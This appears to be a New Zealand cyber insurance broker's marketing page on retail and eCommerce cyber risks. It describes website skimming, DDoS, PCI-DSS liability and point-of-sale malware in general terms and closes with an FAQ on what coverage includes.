Industry Insight
A DDoS attack on a NZ eCommerce site during peak season can cost tens of thousands per day in lost sales.
Why Retail Businesses Need Cyber Insurance
Retail and eCommerce businesses process thousands of payment transactions and hold large databases of customer data. PCI-DSS obligations, Privacy Act compliance and reputational risk make cyber insurance essential. Website skimming attacks and point-of-sale breaches are common vectors.
Top Cyber Risks for Retail Businesses
- !Payment card data theft
- !Website skimming attacks
- !Customer database breach
- !DDoS attacks disrupting sales
- !Supply chain / third-party breaches
Recommended Coverage for Retail Businesses
Typical Premium Range
Premiums vary based on revenue, data held, security controls in place, and coverage limits selected. Our brokers will find the best rate for your specific profile from multiple insurers.
Cyber Threats Facing NZ Retail and eCommerce
Retail and eCommerce businesses in New Zealand face a broad and growing range of cyber threats. Every transaction processed, every customer account created, and every marketing database maintained represents potential cyber exposure. The volume of customer data held by even a small online retailer โ addresses, payment card details, purchase histories, email addresses โ makes retail one of the most frequently targeted sectors for data theft.
The stakes are particularly high for eCommerce businesses because a significant breach can result in near-immediate loss of customer trust, resulting in revenue impacts that persist long after the technical incident is resolved. In the interconnected world of online retail, news of a breach spreads rapidly through social media and review platforms.
Website Skimming: The Hidden Threat
One of the most insidious threats to eCommerce businesses is website skimming โ malicious code injected into checkout pages that captures payment card details as customers enter them. This attack vector, also known as formjacking, is difficult to detect because the website continues to function normally while the criminal simultaneously harvests card data in real time. Skimming attacks have affected thousands of eCommerce sites globally, including many operated by small and medium NZ businesses using popular platforms like WooCommerce and Shopify.
Businesses that suffer skimming attacks face PCI-DSS liability for card brand assessments, costs to identify and remove the malicious code, breach notification obligations to affected customers, and potential liability claims from card holders whose details were stolen.
DDoS Attacks: Taking Your Store Offline
Distributed denial of service (DDoS) attacks overwhelm your website with fake traffic, making it inaccessible to genuine customers. For eCommerce businesses, a DDoS attack during peak trading periods โ Christmas, Black Friday, or during a major promotional campaign โ can result in thousands of dollars per hour in lost sales. Competitors and extortionists sometimes use DDoS attacks strategically to cause maximum business disruption.
PCI-DSS Compliance and Cyber Insurance
Any business that processes, stores or transmits payment card data must comply with the Payment Card Industry Data Security Standard (PCI-DSS). A breach that exposes card data triggers a mandatory PCI forensic investigation, potential card brand fines and assessments, and the cost of card replacement for affected customers. Cyber insurance specifically addresses PCI-DSS liability, covering these fines and assessment costs where they are insurable.
Point-of-Sale System Attacks
Physical retail businesses face additional threats from point-of-sale (POS) system compromises. Malware installed on EFTPOS terminals can capture card data in real time across multiple locations simultaneously. NZ Police and CERT NZ have reported increasing incidents of POS malware, particularly targeting hospitality and retail businesses that use networked EFTPOS systems.
Retail Cyber Insurance Coverage
A comprehensive retail cyber insurance policy covers: customer data breach response and notification, PCI-DSS liability and card brand fines, business interruption losses during website downtime, DDoS attack response, website restoration and code forensics, third-party claims from customers, and supply chain or third-party platform breach costs. Given the interconnected nature of retail systems โ payment processors, fulfilment platforms, marketing tools โ ensuring your policy addresses third-party and supply chain risk is particularly important.
Written by the CyberCover Advisory Team
Licensed NZ insurance advisors specialising in cyber risk for New Zealand businesses. All content reviewed for accuracy and NZ regulatory compliance.
Last updated: May 2026 ยท Get personalised advice โ
Frequently Asked Questions
Does cyber insurance cover PCI-DSS fines after a card breach?
Yes, many cyber insurance policies include PCI-DSS liability cover, which responds to card brand fines and assessment costs following a payment card breach. Confirm this is explicitly included when comparing policies โ it is a standard inclusion in specialist retail cyber policies.
Am I covered for a breach of my eCommerce platform (e.g., Shopify or WooCommerce)?
If a breach occurs through your eCommerce platform โ whether through a vulnerability in your theme, a plugin, or a credentials attack โ your cyber insurance will typically respond to the resulting breach costs. Coverage for losses caused by the platform provider's own infrastructure failure may require separate coverage.
Does cyber insurance cover lost sales during a DDoS attack?
Yes. Business interruption cover within a cyber insurance policy compensates for revenue lost during a covered cyber event, including DDoS attacks that make your website inaccessible to customers. Most policies have a waiting period (often 8 hours) before business interruption cover activates.
What should I do immediately if I suspect my site has been skimmed?
Immediately engage your cyber insurance incident response team โ available 24/7. They will coordinate forensic investigation, assist with removing malicious code, advise on breach notification obligations, and manage PCI-DSS liability. Do not attempt to investigate alone, as this can compromise forensic evidence.